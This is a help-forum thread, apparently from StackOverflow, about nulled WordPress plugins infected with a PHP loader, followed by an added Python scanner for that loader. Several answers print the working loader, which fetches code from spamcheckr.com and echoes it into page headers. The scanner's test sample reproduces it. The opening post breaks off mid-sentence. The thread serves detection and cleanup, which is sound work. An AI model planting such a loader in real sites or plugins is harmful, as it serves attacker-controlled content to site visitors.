Hello StackOverflow community. I have a very interesting (in my opinion) infection to share with you today.
4-5 days ago I realized that my blog's homepage after so
Found it, too. In my case I was using an apparently nulled plug-in (which I didn't realize). It's called woocommerce-checkout-field-editor and was injecting a link to a Justin Bieber youtube video.
The function looks like this and was hidden in \wp-content\plugins\woocommerce-checkout-field-editor\assets\js\class.php:
if (mt_rand(0,99) == 1) {
    function sec_check() {
        if(function_exists('curl_init'))
        {
            $url = "spamcheckr.com/req.php";
            $ch = curl_init();
            $timeout = 5;
            curl_setopt($ch,CURLOPT_URL,$url);
            curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
            curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
            $data = curl_exec($ch);
            curl_close($ch);
            echo "$data";
        }
    }
    add_action('wp_head','sec_check');
}
As we can see, it only displays the spam when a random function hits '1'. Then, it politely asks to see if curl is installed and then sends a simple GET request to the spam server to see what code it should be injecting.
The site is spamcheckr.com.
It then adds itself into the WordPress header and redirects the viewer of the page.
I reported the site to their host and let's see what happens.
I have found this script in the WordPress fooboxV2 plugin (FooBox). The plugin's official URL is http://fooplugins.com/plugins/foobox/
This is the script file path: /wp-content/plugins/fooboxV2/includes/foolic_class.php
You can see the whole script is commented out. But I found this code in that commented code.
<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc2_hhesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc2_hhesk');}} ?>
I have the same problem and think I found the solution! Check your site files for this link: http://spamcheckr.com/l.php I found this link in formcraft plugin.
Like this:
if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}}
Edited: Also check for this: http://spamcheckr.com/req.php
If you are using a nulled version of Gravity Forms you might also get this redirection problem. To solve the problem go to /plugins/gravityforms/settings/setting.php and remove the following code:
<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc2_cahesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc2_cahesk');}} ?>
Good luck.
Good answer above. To add to it, I recommend using grep to anyone who has trouble searching for the code:
grep -nr 'http://spamcheckr.com/l.php' /www/wordpress/wp-content
If you don't have grep and can't access your server (Windows users), download it or use findstr:
findstr /s /i /p "http://spamcheckr.com/l.php" /www/wordpress/wp-content
(Don't forget to change /www/wordpress/wp-content to the location of your WordPress folders.)
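
A scanner for the pattern the answers above describe, as an added example that is not part of any post in this thread: it flags files that name spamcheckr.com and also files that combine the same four traits (mt_rand gate, curl_exec, echo of the response, wp_head hook) under a different host, which a grep for the literal URL would miss. The function names, the sample tree and the example.invalid host are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

DOMAIN = re.compile(r"spamcheckr\.com", re.I)  # host named in the thread
# Traits every quoted variant shares; function names and URL path vary.
MARKERS = {
    "random gate": re.compile(r"mt_rand\s*\(\s*\d+\s*,\s*\d+\s*\)\s*==\s*\d+"),
    "remote fetch": re.compile(r"curl_exec\s*\("),
    "echo response": re.compile(r"echo\s+\"?\$\w+\"?\s*;"),
    "wp_head hook": re.compile(r"add_action\s*\(\s*['\"]wp_head['\"]"),
}

def classify(source):
    """Return 'known-domain', 'same-pattern' (all four traits) or 'clean'."""
    if DOMAIN.search(source):
        return "known-domain"
    if all(rx.search(source) for rx in MARKERS.values()):
        return "same-pattern"
    return "clean"

def scan(root):
    """Map relative path -> verdict for every flagged file under root."""
    verdicts = {p.relative_to(root).as_posix():
                classify(p.read_text(encoding="utf-8", errors="replace"))
                for p in sorted(Path(root).rglob("*")) if p.is_file()}
    return {rel: v for rel, v in verdicts.items() if v != "clean"}

# Constructed sample modelled on the quoted loaders; %s is the fetch URL.
LOADER = """<?php if (mt_rand(1,20) == 1) { function chk() {
$ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "%s");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $data = curl_exec($ch);
curl_close($ch); echo "$data"; } add_action('wp_head', 'chk'); } ?>"""

def demo():
    """Build a constructed wp-content tree in a temp dir and scan it."""
    files = {
        "plugins/a/class.php": LOADER % "http://spamcheckr.com/l.php",
        "plugins/b/setting.php": LOADER % "http://example.invalid/x.php",
        "themes/t/functions.php": "<?php add_action('wp_head', 'meta'); ?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in files.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True)
            target.write_text(body, encoding="utf-8")
        return scan(root)

if __name__ == "__main__":
    print(demo())
```

To check a real install, call scan() with the path to wp-content; a "same-pattern" hit still needs a manual read of the file before anything is deleted.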